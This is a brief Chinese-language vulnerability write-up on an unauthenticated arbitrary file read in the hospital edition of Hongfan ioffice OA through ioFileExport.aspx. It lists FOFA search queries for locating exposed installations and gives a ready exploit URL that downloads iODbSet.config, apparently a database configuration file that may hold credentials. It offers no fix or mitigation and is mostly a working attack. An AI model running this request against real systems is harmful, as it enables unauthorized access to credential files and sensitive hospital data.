红帆OA 医院版ioFileExport.aspx 前台任意文件读取漏洞
漏洞描述
红帆 ioffice 医院版 ioFileExport.aspx 存在未授权任意文件读取。
漏洞影响
资产名称
FOFA
app="ioffice"
app="红帆-ioffice"
漏洞复现
漏洞URL:
http://x.x.x.x/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/iODbSet.config&filename=iODbSet.config&ContentType=application/octet-stream